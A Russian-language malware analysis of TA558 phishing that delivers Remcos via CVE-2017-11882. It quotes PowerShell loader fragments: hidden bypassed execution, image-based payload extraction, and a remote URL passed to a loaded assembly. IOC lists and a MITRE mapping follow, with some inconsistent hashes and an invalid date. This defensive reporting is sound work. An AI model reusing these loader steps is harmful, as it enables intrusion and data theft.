С начала 2024 года аналитики F.A.C.C.T. Threat Intelligence зафиксировали более тысячи фишинговых рассылок вредоносного ПО, направленных на предприятия, государственные учреждения и банки в России и Беларуси. Целью этих рассылок была кража данных и получение доступа к внутренним системам организаций. Аналитики департамента Threat Intelligence тщательно изучили содержимое рассылок и атрибутировали эти атаки к группе ТА558.
TA558 — это киберпреступная группировка, которая занимается проведением фишинговых кампаний и распространением вредоносного программного обеспечения, ведущая свою активность с 2018 года. Основные цели группы — это финансовые учреждения, государственные организации и компании из туристической отрасли. Группа активно использует многоэтапные фишинговые атаки, различные методы социальной инженерии для внедрения вредоносных программ на компьютеры своих жертв, размещение полезной нагрузки на легитимных серверах, а также вредоносное ПО для кражи данных и удаленного контроля над системами жертв.
Кроме указанных признаков ТА558, в новых атаках специалисты F.A.C.C.T выявили характерные для группировки методы стеганографии, то есть сокрытия информации внутри файлов или изображений, при передачи полезной нагрузки, а также использование вредоносных файлов, в именах которых были слова «Love» и «Kiss».
Большинство изученных писем содержали вредоносное программное обеспечение (ВПО) Agent Tesla или Remcos, относящееся к классу Remote Administration Tools (RAT). После запуска на компьютере жертвы, ВПО закрепляется в системе, скрывается от пользователя и предоставляет атакующему доступ к зараженному устройству. Это позволяет злоумышленнику выполнять различные действия: захватывать видео с веб-камеры, управлять буфером обмена и мышью, отображать уведомления, загружать и запускать файлы, собирать информацию о системе, скрывать экраны и окна операционной системы, записывать аудио и нажатия клавиш, а также похищать пользовательские данные.
Несмотря на то, что атаки ТА558 становятся всё более сложными и изощрёнными, система защиты от сложных и неизвестных угроз F.A.C.C.T. Managed XDR перехватила и заблокировала все вредоносные письма, направленные в адрес наших клиентов.
Исследование атак
В ходе одной из атак, зафиксированной 5 марта 2024, злоумышленниками использовалась электронная почта expo@bcmsrll[.]com, привязанная к домену bcmsrll[.]com (зарегистрирован 22.06.2023 у регистратора Namecheap Inc. США).
С помощью графа сетевой инфраструктуры системы F.A.C.C.T. Threat Intelligence была выявлена связь, указывающая на использование данного домена атакующим TA558 в ходе проведения фишинговой атаки на один из банков Республики Беларусь в марте 2024 года.
TA558 известна своим использованием многоэтапных атак, начиная с фишинговых писем, содержащих вредоносные документы Microsoft Office, которые, в свою очередь, загружают и запускают вредоносные программы. В их арсенале находятся такие вредоносные программы, как AgentTesla, Remcos, njRAT и другие.
Группа часто изменяет свои тактики, методы и процедуры (TTP), чтобы избежать обнаружения и затруднить анализ их деятельности. В последнее время TA558 проявляет повышенную активность, используя более сложные техники маскировки и эмуляции легитимного поведения, что позволяет им эффективно обходить системы защиты.
Первоначальным регионом, на который была нацелена TA558 в 2018 году, являлась Латинская Америка, но позже они расширили географию атак. Их фишинговые кампании часто проводятся на нескольких языках, что указывает на глобальный масштаб операций группы.
Начало атаки
В ходе исследования специалисты компании F.A.C.C.T. выяснили, что за период с 1 января 2024 года по 25 мая 2024 года злоумышленники перемещали домен bcmsrll[.]com между тремя различными хостами.
С декабря 2023 домен был зарегистрирован на IP-адресе 185[.]236[.]228[.]95, принадлежащем провайдеру blazingfast[.]io. Затем в марте 2024 его переместили на 216[.]9[.]224[.]70, принадлежащем провайдеру dchost[.]com, а после — в мае 2024 на другой IP этого же провайдера, 213[.]142[.]149[.]158. Именно на последнем он оставался до 18 июня 2024 года.
На данных хостах злоумышленники устанавливали, настраивали и запускали почтовый сервер AutoSMTP (hxxps://www.autosmtp[.]com). В процессе настройки сервера он привязывался к домену, с привязкой к которому создавались адреса электронной почты, которые использовались для рассылки вредоносных писем.
Так, с начала 2024 года системой F.A.C.C.T. Managed XDR было перехвачено 202 фишинговых письма, направленных с адресов электронной почты export@bcmsrll[.]com, expo@bcmsrll[.]com, info@bcmsrll[.]com и contact@bcmsrll[.]com, созданных на указанном домене.
Направленные письма были на русском, английском, турецком, румынском и итальянском языках. Язык выбирался в зависимости от географического расположения компании, от имени которой отправлялось письмо. Это позволило атакующим создать иллюзию доверия и значительно повысить вероятность успеха атаки.
Кроме того, электронные письма могли быть направленны как целевым образом, с указанием в тексте письма обращения к конкретному получателю, так и в ходе массовой рассылки — без какой-либо конкретики.
Информация о компаниях-отправителях, указанных в фишинговых письмах, выглядит полностью достоверной. Атакующие подбирали такие детали, чтобы создать иллюзию легитимности, и этим вводили пользователей в заблуждение.
Как только пользователь открывал такое письмо, он сталкивался с известным брендом, логотипом, убедительным текстом, который подталкивал его к дальнейшим действиям. В частности, в письме содержались четкие указания на необходимость запуска вложенного файла.
Вредоносное вложение
В случае запуска файла-вложения, формат которого был «.docx» или «.xls», происходил запуск макроса, посредством которого осуществлялось направление запроса к ресурсу hxxp://tau[.]id/0vzd8, информация о котором содержалась в теле файла.
В ходе анализа сетевого трафика, зафиксированного 29.01.2024, после осуществления ВПО доступа по указанному URL адресу, сервер вернул ответ «Moved Permanently», в заголовке «location» которого сообщил о новом пути, по которому находится интересующий ресурс. В указанном случае возвращена ссылка на документ hxxp://139[.]144[.]212[.]135/sbi/microsoftupdationgoingformicrftofficeupgradingtonewmsofficeprotoecoltoreducethesystemwrking.doc. Кроме указанных действий, макрос из вредоносного вложения развивает еще одно направление атаки, в ходе которого с указанного хоста осуществляется загрузка VBS скрипта «xmass.vbs». Xmass.vbs эксплуатирует уязвимость редактора уравнений в пакете Microsoft Office, известную как CVE-2017-11882, которая связана с ошибкой в обработке объектов оперативной памяти. В результате эксплуатации этой уязвимости при открытии специально созданного документа происходит переполнение буфера, что позволяет злоумышленникам выполнить произвольный код в системе жертвы.Использование стеганографии
При дальнейшей эксплуатации ВПО осуществляет вызов Windows PowerShell, которому передаются параметры, извлеченные из файла xmass.vbs.
Как видно из представленных изображений, параметр передается с использованием методов стеганографии, что в свою очередь осуществляется с целью предотвращения возможного детектирования запускаемых процессов и инъекций в действующие.
В указанном случае переменная $codigo содержит в себе строку с данными, закодированными в формате Base64.
Метод $oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace(‘DgTre’,’A’) )) заменяет в указанной строке все вхождения подстроки «DgTre» на символ «А», после чего декодирует строку и преобразует её в Unicode, а далее запускает, после чего запускает новый скрытый экземпляр Windows PowerShell, содержащий декодированные данные powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OwjuxD.
В результате полученный скрипт осуществляет запуск другой версии PowerShell, находящейся по пути C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, в скрытом режиме (-windowstyle hidden) и с обходом политики выполнения скриптов (-executionpolicy bypass), а также использованием минимального профиля (-noprofile), что позволяет не загружать пользовательские профили.
Далее переменной $imageUrl присваивается адрес ресурса, на котором находится изображение hxxps://wallpapercave[.]com/uwp/uwp4246971.png, после чего осуществляется скачивание указанного изображения, его преобразование в байткод и его присвоение в переменную $imageBytes = $webClient.DownloadData($imageUrl)).
Далее байты изображения преобразовываются в строку с использованием кодировки UTF-8 ($imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes)), после чего, с использованием специальных индексов расположенных в текстовой строке, осуществляется поиск начала и конца строки закодированной в Base64 ($startFlag = ‘<<BASE64_START>>’ и $endFlag = ‘<<BASE64_END>>’),
а после их нахождения извлекает строку и производит её декодирование из Base64 ($base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command)).
Далее загружает декодированные байты как сборку .NET ($loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)), после чего получает тип Aspose.DrawingSpec.PkikAttrCertNB из загруженной сборки, вызывает метод Run и передает ему параметры ($type.GetMethod(‘Run’).Invoke($null, [object[]] (‘http://139.144.212.135/222/GST.txt’ , ‘desativado’ , ‘2’ , ‘CHSE’ , ‘1’ , ‘C:\ProgramData\’, ‘LnkName’,’RegAsm’)), в результате чего осуществляется создание процесса Regasm.exe, посредством которого происходит заражение устройства трояном Remcos.
Клиенты F.A.C.C.T. Threat Intelligence могут получить аналогичные детальные отчеты о действиях заблокированного при атаках на них или загруженного ими ВПО, с отображением ветвей процессов и используемыми тактиками и техниками в подразделе «Детонация ВПО» раздела «Трояны».
Выявление рассылки
Аналогичным образом специалистами компании F.A.C.C.T. осуществлен анализ всех экземпляров ВПО, находящихся во вложениях указанных писем, в ходе которого выявлено 23 уникальных экземпляра.
№ п/п |
Хэш SHA-256 | Название файла | Дата распространения |
1 | 8d12cfdb1376c99139b8dba94a0c02357bf7652b763d6313d70dde912266905f | swift.xls | 24.05.2024 |
2 | d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be | Offer 15492024 & 15602024.docx | 23.05.2024 |
3 | 4cc7a5fe2d2ffafda3791f0e9cced8f7fe430b598551c2a9277210e87e6df53b | Sipariş detayları.xls | 23.05.2024 |
4 | 4d97a5069b154b2e95af235dd32c82c1bf5b2e4cf2d188067da223f488ebaa48 | ORDIN.xls | 22.05.2024 |
5 | 55f02d8a8f8fe958eeb020593b48d25c86238bd2a7746b9c7b7e4afa9e88c315 | Order Req. March.docx | 11.03.2024 |
6 | c0e49a1256f7e6b66607f2440219ce5e684bd591fc1fb7c64b90e9b9218374a9 | Order sheet RF083901.docx | 22.02.2024 |
7 | 0f9a81081fd7ff58c83c78bcfa4735556fd3ad823f917fe28787085f2d309336 | P.O.27000446.docx | 19.02.2024 |
8 | bc46b7b44928f6ad586d787db33f53ed962aab72441a5518efb3e971d36a40e2 | swift_3094.docx | 13.02.2024, 14.02.2024 |
9 | fda7e2d7a3ee70355988afc70ee4d6ebf08b76ef38f4504aa1cf5f8fa9a99b2e | Yeni fatura.docx | 08.02.2024 |
10 | 383ee0319fade807fd02f12a92d4f2b98ba7137f27212b996f3cc9bd88f278ac | Applicazione di pagamento.docx | 07.02.2024 |
11 | 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39 | Подтверждение заказа.xls | 06.02.2024 |
12 | 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39 | MSKUJH662020SE.docx | 05.02.2024 |
13 | 041c9c4e5242464f8661c6f611da14041447b368e7ff669e5de89e9f805ba486 | Kopia płatności.docx | 02.02.2024 |
14 | 079de6fa0a294bbab99ca481e03e5d0360cdfae1ab41ffd7cc37a92d7bcc25a1 | swift Euro.xls | 01.02.2024 |
15 | 18b8e4782b590141ff10ecde5b76bd1e35d99890a517741ac71408a478a56a81 | Shipment Documents.docx | 31.01.2024 |
16 | 32562e2a917d9827d3f24ac715a6af7468d627594c90126641349d25b735234f | New order list.docx | 30.01.2024 |
17 | 295aef7c1199c1f1ed7d487694e977ec858c5819140ed09808e175fcc49472f0 | Оплата 29.01.24.docx | 29.01.2024 |
18 | ea17ccf4bf55f23b8a93f8e17e470be440211f463d5b7e01958843c8c160f765 | Подтверждение заказа RF0901.docx | 26.01.2024 |
19 | e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035 | Copie de plată.docx | 25.01.2024 |
20 | 89eb53096ec6248185c7797c802d1bd9b539097f01592bfe5f9e183d753d20ce | Ürün listesi.xls | 24.01.2024 |
21 | 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28 | comandă nouă.xls | 23.01.2024 |
22 | a2d5c106ced87a5771490d95bc20c385f8ae49f7e8448b2e68a3c6bf0d96d03b | NEW ITEMS LIST 2024.xls | 16.01.2024 |
23 | 6b19f6c758c0b626d1319314e9679d55701e156a9642409e8899a1e7d6a20026 | Dekont.gz | 09.01.2024 |
Распространение указанных файлов осуществлялось атакующими с использованием адресов электронной почты, привязанных как к указанному доменному имени, так и к вновь выявленным:
Домен | Дата регистрации | Регистратор |
pluse-tr[.]com | 16.04.2024 | Namecheap Inc. США |
hdvysy[.]com | 21.08.2023 | Namecheap Inc. США |
baltictransline[.]store | 21.08.2023 | Namecheap Inc. США |
automaxtool[.]me | 07.06.2023 | Namecheap Inc. США |
akcalogistics[.]shop | 27.13.2023 | Namecheap Inc. США |
naft-dz[.]shop | 04.06.2023 | Namecheap Inc. США |
vervo[.]lat | 19.12.2023 | Namecheap Inc. США |
laceys[.]icu | 26.05.2023 | Namecheap Inc. США |
maximum[.]icu | 21.01.2024 | Namecheap Inc. США |
biatr[.]ooguy[.]com | — | Dynu System Inc. США. |
abspedition[.]icu | 20.01.2024 | Namecheap Inc. США |
midae[.]com | 16.07.2023 | PSI-USA Inc. США |
executivesship[.]com | 29.05.2023 | Namecheap Inc. США |
Всего за период времени с 01.01.2024 по 25.05.2024 атакующими ТА558 с использованием указанных доменных имен в адреса производственных предприятий, учреждений государственного и банковского сектора Российской Федерации и Республики Беларусь было направлено 1022 электронных письма, содержащих в себе ВПО.
Атрибуция атаки к TA558
Анализ обнаруженных образцов позволил специалистам компании F.A.C.C.T. связать данную атаку с ТА558 по следующим признакам:
- Использование длинных цепочек атак;
- Использование методов стеганографии, в ходе которых полезная нагрузка размещалась в изображениях и закодированных текстовых файлах;
- Использование легитимных файлообменников для хранения файлов и изображений содержащих полезную нагрузку;
- Использование вредоносных файлов, имена которых состоят из многочисленных слов и в большинстве своём связаны со словами « Love» и «Kiss». Вместе с тем, в ходе анализа атак, нами обнаружены как уже указанные названия файлов, так и названия, связанные с обновлением программного обеспечения и животным миром.
Аналогичные особенности атак ТА558 отображены в отчетах исследователей:
- https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel
- https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
- https://www.metabaseq.com/ta588/
- https://x.com/ankit_anubhav/status/1689585087267188736
- https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru/
Кроме того, в указанных атаках использовались услуги ресурса withheldforprivacy[.]com (предоставляет услуги сокрытия реальных данных) при осуществлении регистрации доменных имен.
Ключевые выводы
Проанализированная специалистами компании F.A.C.C.T. фишинговая кампания, развернутая группировкой TA558, демонстрирует значительное развитие данного вектора атак. Злоумышленники применяют ухищренные методы сокрытия и доставки ВПО, а также тщательно готовятся к каждой атаке, используя ранее не засвеченные хосты и домены.
Примечательно, что атакующие продолжают эксплуатировать уязвимость 2017 года, выявленную в Microsoft Office (CVE-2017-11882), несмотря на то, что она уже устранена в новых версиях продукта. Это свидетельствует о том, что такие атаки по-прежнему успешны и эффективны. Более того, использование устаревших уязвимостей указывает на недостаточно обновление систем у многих пользователей, что позволяет злоумышленникам легко проникать в их сети.
В последнее время TA558 стала использовать ещё более изощренные методы социальной инженерии, чтобы убедить пользователей открыть вредоносные вложения. Они маскируют свои письма под легитимные сообщения от известных компаний, что значительно увеличивает вероятность успеха атаки.
В связи с этим, мы полагаем, что TA558 продолжит осуществление рассылок вредоносного ПО указанным способом, совершенствуя свои методы и адаптируясь к новым условиям.
Рекомендации
Для предотвращения и защиты от возможных кибератак со стороны группы ТА558 специалисты компании F.A.C.C.T. рекомендуют следующие меры:
- Регулярно обновляйте все установленное ПО. В частности, при использовании Microsoft Office 2019 и выше уязвимость CVE-2017-11882, связанная с переполнением буфера, не будет проэксплуатирована.
- Регулярно обучайте сотрудников методам распознавания фишинга и других форм социальной инженерии. Это поможет сделать их менее уязвимыми.
- Используйте передовые решения для защиты электронной почты, с целью предотвращения вредоносных рассылок. Рекомендуем ознакомиться с возможностями F.A.C.C.T. Business Email Protection для эффективного противодействия таким атакам.
- Внедряйте современные средства для обнаружения и реагирования на киберугрозы. Рекомендуем рассмотреть решение F.A.C.C.T. Managed XDR, которое использует многочисленные источники телеметрии и передовые технологии машинного обучения для выявления угроз и реагирования на них.
- Применяйте данные F.A.C.C.T. Threat Intelligence для обнаружения угроз и проведения проактивного поиска. Это поможет вовремя идентифицировать и нейтрализовать потенциальные опасности.
Эти меры помогут значительно повысить уровень защиты ваших систем и данных от кибератак.
Индикаторы компрометации
Файловые индикаторы
swift.xls
- MD5: fa8159d551c83cd7d529dcd3a7476961
- SHA-1: e02e7147bfb77619291fa222bda9bb3ce4761468
- SHA-256: 8d12cfdb1376c99139b8dba94a0c02357bf7652b763d6313d70dde912266905f
Offer 15492024 & 15602024.docx
- MD5: 0d0f500d82551e733eab0fb1060a49da
- SHA-1: 1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
- SHA-256: d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be
Sipariş detayları.xls
- MD5: e1424a6dc9fa951366f2996cd537dd02
- SHA-1: 967bf96dfb11dee4e1d711c809f8c9fedc29fa69
- SHA-256: 4cc7a5fe2d2ffafda3791f0e9cced8f7fe430b598551c2a9277210e87e6df53b
ORDIN.xls
- MD5: 8f82df8963d12e63c11d24991271c888
- SHA-1: 205aa52dc1b466bb0ff5f5976288aa84e02b94e7
- SHA-256: 4d97a5069b154b2e95af235dd32c82c1bf5b2e4cf2d188067da223f488ebaa48
Order Req. March.docx
- MD5: 656b3681763db100b7ea580d97a16983
- SHA-1: 76641a0aace92c72654df9b16961d2c09ab25352
- SHA-256: 55f02d8a8f8fe958eeb020593b48d25c86238bd2a7746b9c7b7e4afa9e88c315
Order sheet RF083901.docx
- MD5: f83f9fd222724c38642f889e4bff6dbc
- SHA-1: 3993bebae6d4c5c0b0e494472f8f3973367d7f39
- SHA-256: c0e49a1256f7e6b66607f2440219ce5e684bd591fc1fb7c64b90e9b9218374a9
P.O.27000446.docx
- MD5: 11f0c45a84392c11e8d276dc6cfb429a
- SHA-1: 3a2a02046c5ae2b4cd82b425890e198f41adf11a
- SHA-256: 0f9a81081fd7ff58c83c78bcfa4735556fd3ad823f917fe28787085f2d309336
swift_3094.docx
- MD5: 49a3ee37781cac92181f0c1c80e5fb0d
- SHA-1: 6d6d1889835319c81e546728d4ec6f965ece85f0
- SHA-256: bc46b7b44928f6ad586d787db33f53ed962aab72441a5518efb3e971d36a40e2
Yeni fatura.docx
- MD5: 9818f83f09da7f225a28153ad607e821
- SHA-1: 8bd40194c741c9ac9ee50c348981edca15a5519d
- SHA-256: fda7e2d7a3ee70355988afc70ee4d6ebf08b76ef38f4504aa1cf5f8fa9a99b2e
Applicazione di pagamento.docx
- MD5: ff3acc46bc2eaeccd03be2ff5fc3d0ec
- SHA-1: cbd16f778666a312e141fdb1127e3ad8dc7b1712
- SHA-256: 383ee0319fade807fd02f12a92d4f2b98ba7137f27212b996f3cc9bd88f278ac
Подтверждение заказа.xls
- MD5: 368188588ec06a0096f2430a2f98001e
- SHA-1: c049a051e51692f7ae82326c66a7d2a37a1d7054
- SHA-256: 91a14852328b337a5aa1046bc7f92448f2c0a3c2ec5a8a76729de68521fa2a39
MSKUJH662020SE.docx
- MD5: e035324087c878d26291105f711f1a2b
- SHA-1: 86c9cf7d6085507f03c2dcb8d719e43e099c1309
- SHA-256: eecb89aaf97fa8333c2c56c16e3905b2b2764271d7f7944bc71a8aba64d2906c
Kopia płatności.docx
- MD5: 1832d5dcd354aacfcf9a8e15b2b18311
- SHA-1: c709d65418d77978053aa54a33ca5829cea85d95
- SHA-256: 041c9c4e5242464f8661c6f611da14041447b368e7ff669e5de89e9f805ba486
swift Euro.xls
- MD5: 4a677fc6b7305b4eace2b00ac978fb76
- SHA-1: fc965d88d8ec2f49008f93a7e906fde10cb0b947
- SHA-256: 079de6fa0a294bbab99ca481e03e5d0360cdfae1ab41ffd7cc37a92d7bcc25a1
Shipment Documents.docx
- MD5: f78f79a9955725001e502d0946eb3d00
- SHA-1: 925fe336bbc98797e3efcbddc39695b7b0de5534
- SHA-256: 18b8e4782b590141ff10ecde5b76bd1e35d99890a517741ac71408a478a56a81
New order list.docx
- MD5: 8a10bef8547c837c442a585e36e2370d
- SHA-1: 726afc25dbac5004232d28a2b83deb7603e6b375
- SHA-256: 32562e2a917d9827d3f24ac715a6af7468d627594c90126641349d25b735234f
Оплата 29.01.24.docx
- MD5: 10af82086385c6a2514d222753184317
- SHA-1: df565f479665be322b27cb32cbd0eb513d0290ba
- SHA-256: 295aef7c1199c1f1ed7d487694e977ec858c5819140ed09808e175fcc49472f0
Подтверждение заказа RF0901.docx
- MD5: 1eb3ca66ec1151e2a58284ccf4e1d7c7
- SHA-1: 83b79761ce29359817d147e56529f520b0fdcdd8
- SHA-256: ea17ccf4bf55f23b8a93f8e17e470be440211f463d5b7e01958843c8c160f765
Copie de plată.docx
- MD5: 277f8f8a7b767860a8e7bf1aeaa1fd6a
- SHA-1: 64142b293363c2a23cbda456023c9fce51b31333
- SHA-256: e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035
Ürün listesi.xls
- MD5: 87eabdd9eaf85ac612cc32db307462a1
- SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
- SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28
comandă nouă.xls
- MD5: 87eabdd9eaf85ac612cc32db307462a1
- SHA-1: 094626fb8ec66ae99ce6157fbe321d114e7fbbf8
- SHA-256: 110502c15e51f07fe6aff0b0a28d128d60a1eb51df09a2b9fb2db0775fe92f28
NEW ITEMS LIST 2024.xls
- MD5: db896eece25221a79210eecac8d05822
- SHA-1: fbb32ef65e661cf82b3f539ee61cc5d2dade191b
- SHA-256: a2d5c106ced87a5771490d95bc20c385f8ae49f7e8448b2e68a3c6bf0d96d03b
Dekont.gz
- MD5: 123ba210c4bf018520399cb6e5dd48d8
- SHA-1: eb3c3c80485ec3a6cd10538afe94ff0065d5d7e3
- SHA-256: 6b19f6c758c0b626d1319314e9679d55701e156a9642409e8899a1e7d6a20026
Сетевые индикаторы
Хосты
- 139[.]144[.]212[.]135
- 172[.]232[.]4[.]203
- 45[.]79[.]137[.]187
- 172[.]235[.]133[.]243
- 172[.]233[.]129[.]114
- 172[.]232[.]170[.]236
- 172[.]232[.]163[.]207
- 45[.]74[.]19[.]84
- 70[.]34[.]197[.]128
- 172[.]234[.]217[.]97
- 45[.]56[.]102[.]63
- 172[.]232[.]172[.]53
- 172[.]232[.]189[.]152
- 172[.]232[.]172[.]123
- 172[.]232[.]189[.]7
- 75[.]102[.]51[.]237
Домены
- paste[.]ee/d/spi57
- paste[.]ee/d/0aXad
- tau[.]id/ze87s
- paste[.]ee/d/5nJBg
- paste[.]ee/d/62kvY
- tau[.]id/c9izr
- tau[.]id/34x8c
- paste[.]ee/d/Pz2XE
- ye[.]pe/0y2k
- paste[.]ee/d/VkPF6
- paste[.]ee/d/wsePT
- paste[.]ee/d/S8WBJ
- paste[.]ee/d/tggWc
- paste[.]ee/d/7tUhO
- tau[.]id/y3kre
- paste[.]ee/d/Noi6G
- tt[.]vg/IsjCX
- paste[.]ee/d/oDnyo
- tt[.]vg/PqPsi
- l-to[.]com/ru7285wa
- shtu[.]be/e79171
- en0[.]de/serverrrrr
- qr-in[.]com/HDYwZbx
- isols[.]co/zXTgU
- bot.[]ax/hNZdz
- wallpapercave[.]com/uwp
- tau[.]id/0vzd8
- pluse-tr[.]com
- hdvysy[.]com
- baltictransline[.]store
- automaxtool[.]me
- akcalogistics[.]shop
- naft-dz[.]shop
- vervo[.]lat
- laceys[.]icu
- maximum[.]icu
- biatr[.]ooguy[.]com
- abspedition[.]icu
- midae[.]com
- executivesship[.]com
MITRE ATT&CK® Matrix
Tactic | Technique | Procedure |
Resource Development (ТА0042)
|
Compromise Infrastructure: Server
(T1584.004) |
ТА558 использовала легитимные взломанные SMTP-сервера для фишинга. |
Establish Accounts: Email Accounts
(T1585.002) |
ТА558 осуществляли создавала адресов электронных почт, маскируясь под легитимные организации | |
Stage Capabilities
(T1608) |
ТА558 использовала свои сервера, легитимные сервисы и интернет ресурсы для хранения текста для загрузки на них ВПО, а также изображений и файлов байт код которых содержит полезную нагрузку. | |
Acquire Infrastructure
(T1583.001) |
TA558 осуществляет приобретение доменов, в ходе регистрации используя сервисы сокрытия данных | |
Initial Access (TA0001) |
Phishing
(T1566) |
ТА558 осуществляла отправки фишинговых писем |
Phishing: Spearphishing Attachment
(T1566.001) |
ТА558 добавляла вредоносные docx и xls документы | |
Execution (TA0002) |
Command and Scripting Interpreter: PowerShell
(T1059.001) |
TA558 использовала команды Windows PowerShell для загрузки данных, обфускации полезной нагрузки и запуска ВПО |
Command and Scripting Interpreter: Visual Basic
(T1059.005) |
TA558 использовали скрипты Visual Basic для запуска ВПО и эксплуатации CVE | |
Exploitation for Client Execution
(T1203) |
TA558 эксплуатировала CVE-2017-11882 Microsoft Office переполнения буфера для запуска скриптов | |
User Execution: Malicious File (T1204.002) |
TA558 направляла фишинговые письма, текстовая часть которых подталкивала пользователя к открытию вредоносного docx, xls документа находящегося во вложении | |
Defense Evasion (TA0005) |
Obfuscated Files or Information (T1027) |
ТA558 использовала кодировку base64 для сокрытия полезной нагрузки |
Obfuscated Files or Information: Steganography (T1027.003) |
TA558 применяла технику стеганографии в для сокрытия полезной нагрузки в изображениях и текстовых файлах, а также параметрах передаваемых в Windows PowerShell | |
Masquerading: Masquerade File Type (T1036.008) |
ТА558 представляла файлы Visual Basic Script в виде изображений | |
Deobfuscate/Decode Files or Information (T1140) |
TA558 использовало команды позволяющее декодировать полезную нагрузку полученную в ходе атаки из изображений и файлов | |
Virtualization/Sandbox Evasion (T1497) |
ВПО ТА558 осуществляла контроль запуска в виртуальной машине или песочнице путем использования техник контроля наличия пользователя | |
Hide Artifacts: Hidden Windows(T1564.003) |
ТА558 использовала параметры передаваемые в Windows PowerShell для запуска в скрытом режиме | |
Credential Access (TA0006) |
Unsecured Credentials: Credentials In Files (T1552.001) |
ТА558 использовало ВПО Remcos которое осуществляло сбор данных из файлов |
Unsecured Credentials: Credentials in Registry (T1552.002) |
ТА558 использовало ВПО Remcos которое осуществляло сбор данных из регистра системы | |
Discovery (TA0007) |
File and Directory Discovery (T1083) |
ТА558 использовало ВПО Remcos позволяющее осуществлять поиск файлов в системе, а также имеет возможности файлового менеджера |
Account Discovery: Local Account (T1087.001) |
ТА558 использовало ВПО Remcos которое осуществляло сбор информации о локальной учетной записи устройства | |
Modify Registry (T1112) |
ТА558 использовало ВПО Remcos которое осуществляло модификацию реестра | |
Application Windows Discovery (T1010) |
ТА558 использовало ВПО Remcos которое осуществляло сбор информации о приложениях установленных в системе | |
System Location Discovery (T1614) |
ТА558 использовало ВПО Remcos которое осуществляло получение информации об локации жертвы посредством обращения к ресурсу geoplugin[.]net | |
Collection (TA0009) |
Browser Session Hijacking (T1185) |
ТА558 использовало ВПО Remcos которое осуществляло сбор активных сессии из браузеров |
Clipboard Data (T1115) |
ТА558 использовало ВПО Remcos которое осуществляло сбор пользовательской информации из буфера обмена | |
Credentials from Password Stores: Credentials from Web Browsers (T1555.003) |
ТА558 использовало ВПО Remcos которое осуществляло сбор пользовательской информации из браузеров | |
Audio Capture (T1123) |
ТА558 использовало ВПО Remcos которое могло осуществлять снятие информации с аудиовыходов зараженного устройства | |
Input Capture: Keylogging (T1056.001) |
ТА558 использовало ВПО Remcos которое могло осуществлять снятие информации устройств ввода информации зараженного устройства | |
Screen Capture (T1113) |
ТА558 использовало ВПО Remcos которое могло осуществлять получение скриншотов | |
Video Capture (T1125) |
ТА558 использовало ВПО Remcos, которое могло осуществлять снятие информации с вебкамеры зараженного устройства | |
Command And Control (TA0011) |
Application Layer Protocol: Web Protocol (T1071.001) |
TA558 использовало ВПО Remcos, которое взаимодействовало с управляющим сервером через HTTP-протокол |